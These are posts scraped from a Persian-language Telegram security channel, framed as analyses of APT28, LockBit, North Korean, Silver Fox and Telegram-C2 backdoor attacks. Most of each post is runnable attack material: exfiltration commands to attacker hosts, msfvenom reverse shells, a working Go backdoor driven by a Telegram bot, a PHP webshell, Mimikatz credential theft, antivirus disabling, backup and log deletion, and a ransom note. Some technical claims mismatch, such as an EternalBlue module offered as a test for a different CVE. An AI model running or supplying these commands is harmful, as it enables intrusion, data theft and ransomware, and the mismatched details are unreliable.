🔹 مرحله 5: استخراج دیتاها و حذف ردپاها
👈 ارسال اطلاعات به سرور مهاجم
⬅️ فشرده‌سازی و رمزگذاری اطلاعات قبل از ارسال
tar -czvf confidential.tar.gz ~/Documents/
openssl enc -aes-256-cbc -salt -in confidential.tar.gz -out encrypted_data.enc -k StrongPassword
curl -X POST --data-binary @encrypted_data.enc https://malicious-server.com/upload

⬅️ حذف ردپاها برای جلوگیری از شناسایی
rm -rf ~/.bash_history
rm -rf /tmp/list.txt


🔹 جمع‌بندی تاکتیک‌های پیشرفته‌ی APT28 در این حمله
استفاده از PDF آلوده برای اجرای کد از راه دور تو macOS
ایجاد Persistency از طریق Launch Agent و Bash Profile
ارتباط رمزگذاری‌شده با سرور C2 برای دریافت دستورات
حرکت جانبی با SSH و سرقت اطلاعات Keychain
استفاده از AES برای رمزگذاری دیتاها قبل از استخراج

🔹 این حمله نشون داد که macOS به‌اندازه‌ ویندوز در برابر APT‌ها آسیب‌پذیره و APT28 یکی از معدود گروه‌هاییه که حملات پیچیده‌ی اختصاصی برای macOS طراحی می‌کنه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍20👏432❤‍🔥2👌2🎉1💯1
سلام دوستان عزیز.
برای اینکه محتوای این کانال ادامه‌دار و همچنین گسترده‌تر بشه، دنبال جمع‌کردن یه تیم برای تولید محتوای تخصصی (بحث آموزشی نیست بلکه تحلیلی و انتقال تجربه‌اس) هستم. اگه:
۱. اگه تو حوزه امنیت دارین فعالیت می‌کنین
۲. وقت و حوصله دارین
۳. ایده برای تولید محتوا دارین
۴. می‌خواین رو پرسونال برندینگ‌تون کار کنین
به آی‌دی من (@vahid_elmi) پیام بدین تا بیشتر باهم صحبت کنیم.
نکته: هیچ پلن درآمد مستقیمی روی این کانال وجود نداره و هر محتوایی که تولید بشه رایگان تو دسترس عموم قرار می‌گیره.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
❤‍🔥15👍8🤡63👎2🌭2🔥1👏1
⚙️ تحلیل حمله LockBit به شرکت صنایع خودروسازی – نفوذ از طریق VPN ناامن

🔹 مقدمه:
لاک‌بیت یکی از پیچیده‌ترین گروه‌های باج‌افزاریه که تاکتیک‌های پیشرفته‌ای رو برای نفوذ، رمزگذاری، و اخاذی از سازمان‌ها پیاده‌سازی می‌کنه. تو یکی از حملاتی که این گروه انجام داده، اونا تونستن از طریق یه VPN ناامن به شبکه‌ی یه شرکت خودروسازی صنعتی نفوذ کنن. تو این حمله، اونا به خطوط تولید، دیتابیس تأمین‌کنندگان و مستندات محرمانه‌ی طراحی خودروها دسترسی پیدا کردن و در نهایت با رمزگذاری گسترده سیستم‌ها، از قربانی درخواست باج کردن.

🔹 فاز 1: دسترسی اولیه – سواستفاده از آسیب‌پذیری تو VPN
👈 چرا VPN نقطه‌ی ضعف شد؟
⬅️ شرکت خودروسازی از Fortinet VPN استفاده می‌کرد که آپدیت نشده بود.
⬅️ این VPN حاوی آسیب‌پذیری CVE-2020-12812 بود که به هکرها اجازه می‌داد بدون نیاز به احراز هویت دو مرحله‌ای (MFA Bypass) به شبکه وصل بشن.
⬅️ هکرها ابتدا با سرچ تو اینترنت و دارک‌وب یه لیستی از شرکت‌هایی که از این VPN استفاده می‌کردن رو به‌دست آوردن.
👈 شناسایی و سواستفاده از VPN آسیب‌پذیر
⬅️ گام 1: شناسایی دامنه‌ی شرکت خودروسازی
subfinder -d company-auto.com -o subdomains.txt

ابزار subfinder برای پیداکردن ساب‌دومین‌های فعال، از جمله vpn.company-auto.com استفاده شد.
⬅️ گام 2: اسکن پورت‌های باز برای پیدا کردن سرویس VPN
nmap -p 443 --noscript sslvpn-fortigate.nse vpn.company-auto.com

این دستور نشون می‌داد که Fortinet VPN روی پورت 443 در حال اجراست.
⬅️ گام 3: بررسی آسیب‌پذیری Fortinet CVE-2020-12812
python fortinet-exploit.py --target vpn.company-auto.com

اسکریپت به هکرها اجازه می‌داد تا بدون نیاز به MFA وارد بشن.
⬅️ گام 4: دسترسی به شبکه‌ی داخلی با استفاده از VPN
openvpn --config company-vpn.ovpn --auth-user-pass creds.txt

پس از به‌دست آوردن دسترسی، هکرها وارد شبکه‌ی داخلی سازمان شدن.

🔹 فاز 2: شناسایی و حرکت جانبی (Lateral Movement)
👈 گسترش نفوذ تو شبکه
⬅️ گام 1: شناسایی دامنه‌ی Active Directory
nltest /dclist:company-auto.com

لیست سرورهای Domain Controllers مشخص شدن.
⬅️ گام 2: استخراج اطلاعات کاربران با LDAP
Get-ADUser -Filter * -Properties Name,Email,LastLogonDate

این دستور لیستی از حساب‌های کاربری رو نمایش می‌داد.
⬅️ گام 3: اجرای Mimikatz برای سرقت اطلاعات لاگین
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

این ابزار اطلاعات حساب‌های مدیر شبکه رو استخراج می‌کرد.
⬅️ گام 4: استفاده از Pass-the-Hash برای ورود به سرور تولید
psexec \\production-server -u administrator -p NTLMHASH cmd.exe

حالا هکرها کنترل سرورهای تولید خودرو رو در اختیار داشتن.

🔹 فاز 3: رمزگذاری سیستم‌ها و خرابکاری صنعتی
👈 اجرای باج‌افزار LockBit تو کل شبکه
⬅️ گام 1: غیرفعال‌سازی ابزارهای امنیتی
Set-MpPreference -DisableRealtimeMonitoring $true

آنتی‌ویروس ویندوز خاموش شد.
⬅️ گام 2: حذف نسخه‌های پشتیبان برای جلوگیری از بازیابی
vssadmin delete shadows /all /quiet

تمام نسخه‌های بکاپ حذف شد.
⬅️ گام 3: اجرای LockBit تو تموم سیستم‌های شبکه با Group Policy
Invoke-Command -ComputerName * -ScriptBlock { Start-Process "C:\Windows\System32\lockbit.exe" }

این دستور باج‌افزار رو روی تموم کامپیوترهای دامین اجرا می‌کرد.
⬅️ گام 4: قفل کردن دیتابیس‌ها با رمزگذاری SQL Server
EXEC xp_cmdshell 'LockBit-Encrypt.exe -path C:\SQL-Data\'

تمام اطلاعات تأمین‌کنندگان قفل شد.
⬅️ گام 5: تغییر پارامترهای سیستم‌های کنترل صنعتی (ICS) برای خرابکاری تولید
MODBUS_WRITE -slave 1 -register 40001 -value 9999

دیتاهای کنترل‌کننده‌های PLC تو خط تولید تغییر داده شد.

🔹 فاز 4: سرقت و افشای دیتاها (Double Extortion)
👈 استخراج دیتاهای محرمانه
⬅️ گام 1: استخراج اطلاعات طراحی خودروها
Get-ChildItem "C:\Designs\Confidential" -Recurse | Compress-Archive -DestinationPath C:\Temp\designs.zip

⬅️ گام 2: ارسال دیتاها به سرور مهاجمین
scp /Temp/designs.zip attacker@malicious-server:/data/

⬅️ گام 3: تهدید شرکت برای پرداخت باج:
Your company has been hacked by LockBit.
All your data is encrypted and stolen.
Pay 30 BTC or we will leak your secret designs.


🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1712👏5👌4🔥1🤣1
تشریح حمله هکرهای کره شمالی به دولوپرای فریلنسر (قسمت اول)

تو دو سه روز گذشته خبری منتشر شده که هکرهای منتسب به کره شمالی، دولوپرای فریلنسر رو مورد هدف قرار دادن. این گروه‌ها و به ویژه لازاروس، اخیراً دولوپرای فریلنسری رو از طریق آفرهای شغلی فیک هدف قرار داده‌ان تا بدافزارها رو تو سیستم‌های اونا مستقر کنن. این حملات با استفاده از تکنیک‌های مهندسی اجتماعی، اکسپلویت‌های زیرودی، فیشینگ و بدافزارهای مخفی انجام می‌شن. این حمله رو تو دو قسمت و 5 مرحله باهم بررسی می‌کنیم:
⬅️ مرحله ۱: شناسایی و انتخاب قربانی
⬅️ مرحله ۲: ارسال پیشنهاد شغلی فیک و فیشینگ
⬅️ مرحله ۳: استقرار بدافزار و اکسپلویت
⬅️ مرحله ۴: استخراج اطلاعات و حفظ دسترسی
⬅️ مرحله ۵: حذف ردپاها و خروج از سیستم

🔹 مرحله ۱: شناسایی و انتخاب قربانی
👈 روش‌های شناسایی دولوپرا
هکرهای کره شمالی از ابزارهای OSINT برای جمع‌آوری اطلاعات در مورد دولوپرای فریلنسر و برنامه‌نویسایی که تو شرکت‌های بزرگ فناوری کار می‌کنن، استفاده می‌کنن.
👈 ابزارهای استفاده‌شده تو این مرحله:
⬅️ یک. theHarvester (برای جمع‌آوری ایمیل و اطلاعات شبکه‌های اجتماعی)
⬅️ دو. SpiderFoot (برای اسکن داده‌های عمومی)
⬅️ سه. Maltego (برای ایجاد ارتباط بین افراد و سازمان‌ها)
👈 دستورات OSINT برای شناسایی ایمیل و اطلاعات عمومی یه دولوپر:
theHarvester -d example.com -b linkedin
spiderfoot -s example.com -m social

👈 مهم‌ترین ری‌سورس برای شناسایی اهداف:
⬅️ لینکدین: پیدا کردن دولوپرای فعال تو پروژه‌های حساس
⬅️ گیت‌هاب و Stack Overflow: بررسی ریپازیتوری کدهای فریلنسری و پروژه‌های مرتبط
⬅️ فریلسنر، Upwork، Fiverr: ارتباط با فریلنسرها و ارسال پیشنهادهای کاری فیک

🔹 مرحله ۲: ارسال پیشنهاد شغلی جعلی و فیشینگ
هکرها یه پروفایل فیک از شرکت‌های معتبر ایجاد کرده و از طریق ایمیل، لینکدین یا پلتفرم‌های فریلنسری به دولوپرا پیشنهاد کار می‌دن.
👈 روش ۱: ایمیل فیشینگ (Spear Phishing)
⬅️ ارسال یه ایمیل فیک از طرف شرکت‌های معروف مثل Google، Microsoft یا Tesla
⬅️ ایمیل حاوی لینک به سایت‌های جعلی لاگین یا فایل‌های آلوده (PDF, DOCX, ZIP) است.
👈 نمونه ایمیل فیشینگ استفاده‌شده تو این حمله:
From: hr@google-careers.com
To: developer@example.com
Subject: Exciting Job Opportunity - Senior Software Engineer

Hello [Developer Name],

We have reviewed your GitHub projects and believe you would be a great fit for our new AI initiative at Google. Please find the attached job denoscription and coding test.

Best regards,
Google HR Team

👈 روش ۲: آزمون برنامه‌نویسی آلوده
⬅️ از تارگت خواسته می‌شه یه تست کدنویسی رو دانلود و اجرا کنه.
⬅️ فایل حاوی اسکریپت‌های مخربه که بعد از اجرا دسترسی ریموت رو برای مهاجم باز می‌کنه.
نمونه‌ای از کد مخرب تو آزمون کدنویسی (Python):
import os
import requests

# دریافت کدهای مخرب از سرور هکر
payload = requests.get("http://attacker.com/malware.py").text
exec(payload) # اجرای کد مخرب

👈 روش ۳: ارسال آفر شغلی تو لینکدین با لینک مخرب
⬅️ ارسال لینک‌هایی که تارگت رو به یه صفحه جعلی لاگین GitHub یا Outlook هدایت می‌کنن.
⬅️ حمله Evilginx2 برای سرقت کوکی‌های احراز هویت (Session Hijacking)
👈کانفیگ Evilginx2 برای حمله فیشینگ به گیت‌هاب:
config domain attacker.com
phishlets enable github
phishlets hostname github.attacker.com
lures create github
lures edit 0 set url https://github.com/login
lures get-url 0


🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍15🔥5❤‍🔥3👌2💯21🤔1😍1🤓1
تشریح حمله هکرهای کره شمالی به دولوپرای فریلنسر (قسمت دوم)

🔹 مرحله ۳: استقرار بدافزار و اکسپلویت (Exploitation & Malware Deployment)
روش‌های استقرار بدافزار
👈 یک. ماکروهای مخرب تو فایل‌های آفیس
هکرها فایل‌های ورد یا اکسل حاوی ماکروهای مخرب ارسال می‌کنن. وقتی که تارگت ماکرو رو فعال کنه، یه بدافزار دانلود و اجرا می‌شه.
کد VBA مخرب تو فایل ورد برای دانلود بدافزار:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <کد_پایه64>"
End Sub

👈 دو. پیلود مخرب با استفاده از Metasploit
⬅️ تولید فایل مخرب با msfvenom
msfvenom -p windows/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > job_offer.exe

⬅️ اجرای اکسپلویت تو Metasploit
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST attacker.com
set LPORT 443
run

👈 سه. سرقت اطلاعات با استفاده از Mimikatz
بعد از دسترسی به سیستم، سرقت هش‌های NTLM برای حرکت جانبی تو شبکه:
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam


🔹 مرحله ۴: استخراج اطلاعات و حفظ دسترسی (Persistence & Data Exfiltration)
👈 یک. سرقت کوکی‌های احراز هویت برای دسترسی پایدار
sqlite3 ~/.mozilla/firefox/*.default/cookies.sqlite "SELECT host, name, value FROM moz_cookies"

👈 دو. استفاده از DNS Tunneling برای استخراج دیتاها
dnscat2 --dns attacker.com

👈 سه. برقراری ارتباط پایدار با سرور هکر با پاورشل
$webclient = New-Object System.Net.WebClient
$webclient.UploadFile("http://attacker.com/upload", "C:\Users\Public\secrets.docx")


🔹 مرحله ۵: حذف ردپاها و خروج از سیستم (Covering Tracks & Cleanup)
👈 یک. پاک‌سازی لاگ‌های ویندوز
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

👈 دو. حذف تاریخچه اجرا تو پاورشل
Remove-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

👈 سه. پاک کردن فایل‌های ایجادشده تو سیستم
del /F /Q /S C:\Users\Public\malware.exe


🔹 روش‌های دفاعی پیشنهادی
⬅️ فعال‌سازی احراز هویت چندمرحله‌ای (MFA)
⬅️ عدم دانلود و اجرای فایل‌های ناشناس از منابع غیرمعتبر
⬅️ اجرای کدهای ناشناس تو محیط‌های ایزوله (Sandbox)
⬅️ استفاده از ابزارهای EDR/XDR برای شناسایی تهدیدات پیشرفته
⬅️ بررسی دقیق پیشنهادهای شغلی قبل از تعامل با ارسال‌کننده

🔹 نتیجه‌گیری
این حمله نشون می‌ده که هکرهای کره شمالی از روش‌های پیشرفته‌ی فریب و بدافزارهای پیچیده برای سرقت اطلاعات و ایجاد نفوذهای بلندمدت تو سیستم‌ها استفاده می‌کنن. دولوپرا و فریلنسرها باید بیشتر از همیشه نسبت به حملات فیشینگ و پیشنهادهای شغلی مشکوک هوشیار باشن.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍14🔥42🥰2🙏2👨‍💻2🤔1👌1🍌1
تحلیل استفاده بکدور جدید مبتنی بر Go از API ربات تلگرام برای عملیات پنهانی با C2 (قسمت اول)

تو چن روز گذشته، محققای امنیت سایبری یه بکدور جدید مبتنی بر زبان برنامه‌نویسی Go (Golang) رو شناسایی کردن که از API ربات تلگرام برای برقراری ارتباطاتC2 استفاده می‌کنه. تو این پست می‌خوایم کمی این مورد رو بررسی فنی‌تر انجام بدیم که این تحلیل شامل راه‌اندازی سرور C2 با استفاده از تلگرام، روش‌های دور زدن شناسایی، و ابزارهای مورد استفاده تو این حمله‌اس.

🔹 یک. راه‌اندازی سرور C2 با استفاده از تلگرام
برای استفاده از API تلگرام به عنوان مرکز C2، باید مراحل زیر رو طی کنیم:
👈 مرحله ۱: ایجاد یک ربات تلگرام
⬅️ الف. به تلگرام رفته و @BotFather رو جستجو کنین.
⬅️ ب. دستور /newbot رو ارسال کنین.
⬅️ ج. نام و نام کاربری ربات رو تنظیم کنین.
⬅️ د. توکن دریافت‌شده رو ذخیره کنین. این توکن برای برقراری ارتباط استفاده می‌شه.
👈 مرحله ۲: دریافت و ارسال دستورات با Golang
برای تعامل با API تلگرام، از لایبرری github.com/go-telegram-bot-api/telegram-bot-api استفاده می‌کنیم.
نمونه کد برای دریافت دستورات از تلگرام و اجرای اونا تو سیستم قربانی:
package main

import (
"log"
"os/exec"
"github.com/go-telegram-bot-api/telegram-bot-api"
)

func main() {
bot, err := tgbotapi.NewBotAPI("YOUR_BOT_TOKEN")
if err != nil {
log.Fatal(err)
}

u := tgbotapi.NewUpdate(0)
u.Timeout = 60
updates, err := bot.GetUpdatesChan(u)

for update := range updates {
if update.Message == nil {
continue
}

cmd := update.Message.Text
output, err := exec.Command("sh", "-c", cmd).Output()
if err != nil {
output = []byte(err.Error())
}

msg := tgbotapi.NewMessage(update.Message.Chat.ID, string(output))
bot.Send(msg)
}
}

این کد پیام‌های دریافتی از ربات تلگرام رو پردازش می‌کنه. هر پیام به عنوان یه دستور سیستم اجرا شده و خروجی اون به مهاجم ارسال می‌شه.

🔹 دو. پنهان‌سازی و جلوگیری از شناسایی
برای افزایش شانس اجرای موفقیت‌آمیز، چندین تکنیک دور زدن شناسایی به کار گرفته می‌شه.
👈 الف) مبهم‌سازی کد (Obfuscation)
⬅️ ابزار garble برای مبهم‌سازی باینری Golang
GOOS=linux GOARCH=amd64 garble -literals build -o payload obfuscated.go

👈 ب) اجرای بدافزار به صورت سرویس مخفی
⬅️ تبدیل بدافزار به یه سرویس پس‌زمینه تو لینوکس:
cp payload /usr/bin/systemd-networkd
chmod +x /usr/bin/systemd-networkd
echo '[Service]
ExecStart=/usr/bin/systemd-networkd
Restart=always' > /etc/systemd/system/networkd.service
systemctl enable networkd
systemctl start networkd

تو ویندوز، می‌شه از schtasks برای ایجاد یه تسک مخفی استفاده کرد:
schtasks /create /tn "WindowsUpdate" /tr "C:\Users\Public\malware.exe" /sc onlogon /ru SYSTEM /f


🔹 سه. استفاده از ngrok برای دسترسی مستقیم
وقتی که نمی‌شه از تلگرام استفاده کرد، ngrok یه راه ارتباطی امن برای C2 فراهم می‌کنه.
👈 نصب ngrok
wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip
unzip ngrok-stable-linux-amd64.zip
./ngrok authtoken YOUR_AUTH_TOKEN

👈 ایجاد یه تانل مخفی برای ارتباط با بکدور:
./ngrok tcp 4444

بعد از اجرای این دستور، ngrok یک آدرس tcp:// ایجاد می‌کنه که مهاجم می‌تونه برای ارتباط استفاده کنه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13🔥73😍2💯2🍌21❤‍🔥1🎉1🤣1
تحلیل استفاده بکدور جدید مبتنی بر Go از API ربات تلگرام برای عملیات پنهانی با C2 (قسمت دوم)

🔹 چهار. پیلودها و اکسپلویت‌های مورد استفاده
👈 الف) اکسپلویت RCE
اگه دسترسی به سرور قربانی از طریق آسیب‌پذیری‌های تحت وب ممکن باشه، می‌شه یه webshell مستقر کرد:
<?php echo shell_exec($_GET['cmd']); ?>

این شل رو می‌شه با curl استفاده کرد:
curl "http://victim.com/shell.php?cmd=whoami"

👈 ب) سرریز بافر تو سرویس‌های ناامن
اگه سرویس‌های آسیب‌پذیر به سرریز بافر پیدا بشن، می‌شه از ابزار msfvenom برای ساخت پیلود استفاده کرد:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=your-ip LPORT=4444 -f elf > payload.elf

و بعدش اونو تو سیستم هدف اجرا کرد:
chmod +x payload.elf
./payload.elf


🔹 پنج. نکات امنیتی برای جلوگیری از شناسایی و کشف
👈 الف) استفاده از رمزگذاری برای ارتباطات
برای جلوگیری از شناسایی، می‌شه از AES برای رمزگذاری ارتباطات استفاده کرد. نمونه کد رمزگذاری و رمزگشایی:
import (
"crypto/aes"
"crypto/cipher"
"encoding/hex"
)

func encrypt(data, key string) string {
block, _ := aes.NewCipher([]byte(key))
ciphertext := make([]byte, len(data))
stream := cipher.NewCTR(block, make([]byte, aes.BlockSize))
stream.XORKeyStream(ciphertext, []byte(data))
return hex.EncodeToString(ciphertext)
}

func decrypt(data, key string) string {
ciphertext, _ := hex.DecodeString(data)
block, _ := aes.NewCipher([]byte(key))
plaintext := make([]byte, len(ciphertext))
stream := cipher.NewCTR(block, make([]byte, aes.BlockSize))
stream.XORKeyStream(plaintext, ciphertext)
return string(plaintext)
}

👈 ب) استفاده از اجرای مخفی تو ویندوز
برای اجرای مخفی تو ویندوز، می‌شه از regsvr32 استفاده کرد:
regsvr32 /s /n /u /i:http://attacker.com/payload.sct scrobj.dll

این دستور باعث اجرای کد مخرب از طریق COM بدون ایجاد پردازش مشهود می‌شه.

🔹 نتیجه‌گیری
⬅️ استفاده از تلگرام به عنوان C2 راهی برای پنهان‌سازی ارتباطات بدافزاره.
⬅️ گولنگ به دلیل قابل حمل بودن و سختی دی‌کامپایل شدن، گزینه‌ای محبوب برای توسعه‌دهنده‌های بدافزار شده.
⬅️ استفاده از ngrok، msfvenom، و AES در کنار روش‌های مبهم‌سازی، شانس شناسایی و کشف رو کاهش می‌ده.

⚠️ نکته: این مقاله صرفاً برای اهداف آموزشی و امنیتی نوشته شده است. مسئولیت استفاده نادرست از این اطلاعات بر عهده کاربر خواهد بود.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍5💯311👌1😍1🤣1🍌1
تحلیل حمله Silver Fox APT با بدافزار Winos 4.0 علیه سازمان‌های تایوانی - قسمت اول

گروه Silver Fox APT از بدافزار Winos 4.0 برای نفوذ و کنترل سازمان‌های تایوانی استفاده کرده. تو این گزارش، حمله رو از دیدگاه فنی بررسی می‌کنیم و ابزارها، تکنیک‌ها، کدهای مخرب و روش‌های استفاده‌شده رو تحلیل می‌کنیم.

🔹 مرحله ۱: شناسایی هدف
👈 ابزارهای شناسایی استفاده‌شده
⬅️ ابزار theHarvester – جمع‌آوری ایمیل‌های کارکنان از منابع عمومی:
theHarvester -d targetcompany.com -l 500 -b google

⬅️ ابزار Shodan – اسکن سرورها و سرویس‌های باز:
shodan search "port:3389 country:TW"

⬅️ ابزار Maltego – تحلیل ارتباطات کارکنان از شبکه‌های اجتماعی.
🔵خروجی این مرحله: لیست ایمیل‌های کارکنان، سرورهای آسیب‌پذیر، ارتباطات سازمانی.

🔹 مرحله ۲: نفوذ اولیه
👈 روش‌های نفوذ
⬅️ یک. حمله فیشینگ با اسناد آلوده: هکرها ایمیل‌های فیک با فایل‌های Word حاوی ماکرو مخرب رو ارسال می‌کردن.
کد VBA مخرب تو فایل Word برای دانلود بدافزار Winos 4.0:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -EncodedCommand <کد_پایه64>"
End Sub

⬅️ دو. اکسپلویت آسیب‌پذیری‌های زیرودی
هکرها از CVE-2024-20700 (آسیب‌پذیری RCE تو ویندوز) برای اجرای کد از راه دور استفاده کردن.
تست آسیب‌پذیری با Metasploit:
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS target_ip
set PAYLOAD windows/meterpreter/reverse_tcp
exploit

⬅️ سه. حمله به پروتکل RDP با Brute Force
استفاده از Hydra برای پیدا کردن پسوردهای ضعیف RDP
hydra -L user_list.txt -P password_list.txt rdp://target_ip

🔵خروجی این مرحله: دسترسی اولیه به سیستم هدف.

🔹 مرحله ۳: نصب بدافزار Winos 4.0
👈 ویژگی‌های Winos 4.0
⬅️ اجرای مخفیانه به‌عنوان پردازش سیستم
⬅️ مخفی‌سازی با استفاده از تکنیک Process Hollowing
⬅️ ایجاد ارتباط با سرور C2 از طریق HTTP و DNS Tunneling
کد Winos 4.0 برای ایجاد ارتباط با سرور هکرها:
#include <windows.h>
#include <wininet.h>

int main() {
HINTERNET hInternet, hConnect;
hInternet = InternetOpen("Winos", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
hConnect = InternetOpenUrl(hInternet, "http://attacker.com/payload.exe", NULL, 0, INTERNET_FLAG_RELOAD, 0);
if (hConnect) {
// دانلود و اجرای بدافزار اصلی
}
InternetCloseHandle(hConnect);
InternetCloseHandle(hInternet);
return 0;
}

⬅️ تکنیک Process Hollowing برای مخفی‌سازی بدافزار:
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, target_pid);
LPVOID pRemoteCode = VirtualAllocEx(hProcess, NULL, payload_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
WriteProcessMemory(hProcess, pRemoteCode, payload, payload_size, NULL);
CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteCode, NULL, 0, NULL);

⬅️ ساخت Payload مخرب با Metasploit:
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=attacker.com LPORT=443 -f exe > winos4.exe

🔵خروجی این مرحله: اجرای Winos 4.0 روی سیستم قربانی.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8👍4🎉32👏2👌2🕊1🏆1
⚠️ کانال Try Hack Box یه پستی گذاشت مربوط به آسیب پذیری با شناسه CVE-2025-21333 که به نظرم تحلیلش می‌تونه جالب باشه.

آسیب‌پذیری با شناسه CVE-2025-21333، یه آسیب‌پذیری افزایش سطح دسترسی (LPE) تو درایور vkrnlintvsp.sysه که مربوطه به Hyper-V تو ویندوز. این نقص به دلیل یه Heap Overflow ایجاد شده که به هکر لوکال احراز هویت‌شده اجازه می‌ده کنترل کامل حافظه کرنل رو در اختیارش بگیره و در نهایت به سطح دسترسی SYSTEM دست پیدا کنه.
سطح تهدید: بالا
سیستم‌های آسیب‌پذیر: ویندوز سرور و کلاینتی که از Hyper-V استفاده می‌کنن
دلیل بهره‌برداری: عدم بررسی کافی تو مدیریت حافظه توکرنل

🔹 یک. مشکل اصلی کجاست؟
درایور vkrnlintvsp.sys که بخشی از Hyper-Vه، وظیفه پردازش درخواست‌های خاصی رو از ماشین‌های مجازی داره. هکر می‌تونه با ارسال یک درخواست IOCTL خاص به این درایور، باعث شه که کرنل حافظه بیشتری از حد مجاز تو هیپ، اختصاص بده، اما بدون بررسی مقدار واقعی داده‌ای که تو اون نوشته می‌شه. این یعنی:
⬅️ عدم بررسی طول داده ورودی: مهاجم می‌تونه داده‌ای بزرگ‌تر از حافظه اختصاص‌یافته ارسال کنه.
⬅️ سرریز تو حافظه هیپ: داده‌های اضافه تو ساختارهای مجاور تو حافظه بازنویسی می‌شن.
⬅️ امکان کنترل کرنل: با جایگزینی Pointers یا Function Pointers، مهاجم می‌تونه کنترل اجرای کد رو به دست بگیره.

🔹 دو. سواستفاده از سرریز هیپ
سرریز تو هیپ خطرناک‌تر از استکه، چرا که اگه بشه جداول تخصیص حافظه رو دستکاری کرد، می‌شه به طور دلخواه حافظه خواند/نوشت و به کرنل حمله کرد.
مهاجم برای سواستفاده از این نقص می‌تونه:
⬅️ از Grooming Heap (چیدمان خاص حافظه قبل از حمله) استفاده کنه تا داده‌های خودش رو تو یه منطقه حساس از حافظه قرار بده.
⬅️ با بهره‌گیری از Fake Object Injection، اشاره‌گرها یا مقادیر مهم تو کرنل رو تغییر بده.
⬅️ و در نهایت، از ROP (Return-Oriented Programming) یا Shellcode Injection برای اجرای کد دلخواه تو سطح کرنل استفاده کنه.

🔹 تو لینکی که بالا ارجاع دادم PoC مربوط به این آسیب‌پذیری قرار داده شده می‌تونین مطالعه کنین.

🔹 سه. نحوه جلوگیری و راهکارهای دفاعی
⬅️ آپدیت ویندوز: مایکروسافت تو ژانویه ۲۰۲۵ این مشکل رو از طریق انتشار پچ برطرف کرده.
⬅️ محدود کردن دسترسی کاربرای لوکال: فقط کاربرای خاص باید دسترسی به درایورهای کرنل داشته باشن.
⬅️ مانیتورینگ درخواست‌های IOCTL: استفاده از EDR (Endpoint Detection & Response) برای شناسایی درخواست‌های مشکوک.
⬅️ استفاده از HVCI (Hypervisor-Enforced Code Integrity): این فیچر تو ویندوز از اجرای کدهای ناشناس تو کرنل جلوگیری می‌کنه.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍10🔥43❤‍🔥2👌21🎉1🤮1🌭1
تحلیل حمله Silver Fox APT با بدافزار Winos 4.0 علیه سازمان‌های تایوانی - قسمت دوم

🔹 مرحله ۴: سرقت اطلاعات و حرکت جانبی
👈 سرقت اطلاعات
⬅️ استفاده از Mimikatz برای استخراج هش‌های NTLM:
mimikatz
privilege::debug
sekurlsa::logonpasswords

⬅️ دزدیدن کوکی‌های احراز هویت مرورگر:
sqlite3 ~/.mozilla/firefox/*.default/cookies.sqlite "SELECT host, name, value FROM moz_cookies"

⬅️ جمع‌آوری اطلاعات با PowerShell:
Get-ChildItem -Path C:\Users\ -Recurse -Filter *.docx,*.xlsx,*.pdf

👈 حرکت جانبی تو شبکه
⬅️ پیدا کردن سیستم‌های دیگه تو شبکه با BloodHound:
neo4j console
bloodhound-python -u admin -p password -d targetcompany.com --collect all

⬅️ انتقال بدافزار به سایر سیستم‌ها با PsExec:
psexec \\targetpc -u Admin -p Password -i C:\Users\Public\winos4.exe


🔹 مرحله ۵: ارتباط با سرور C2 و ارسال اطلاعات
⬅️ استفاده از DNS Tunneling برای ارسال اطلاعات بدون شناسایی:
dnscat2 --dns targetcompany.com

⬅️ آپلود اطلاعات به سرور هکر با PowerShell:

$webclient = New-Object System.Net.WebClient
$webclient.UploadFile("http://attacker.com/upload", "C:\Users\Public\secrets.zip")

🔵خروجی این مرحله: ارسال داده‌های حساس به سرور هکر.

🔹 مرحله ۶: حذف ردپاها و خروج از سیستم
⬅️ حذف لاگ‌های ویندوز:
wevtutil cl System
wevtutil cl Security
wevtutil cl Application

⬅️ پاک‌سازی هیستوری اجرا تو PowerShell:
Remove-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU

🔵خروجی این مرحله: مخفی‌سازی ردپای حمله و خروج از سیستم بدون شناسایی.

🔹 راه‌های دفاعی پیشنهادی
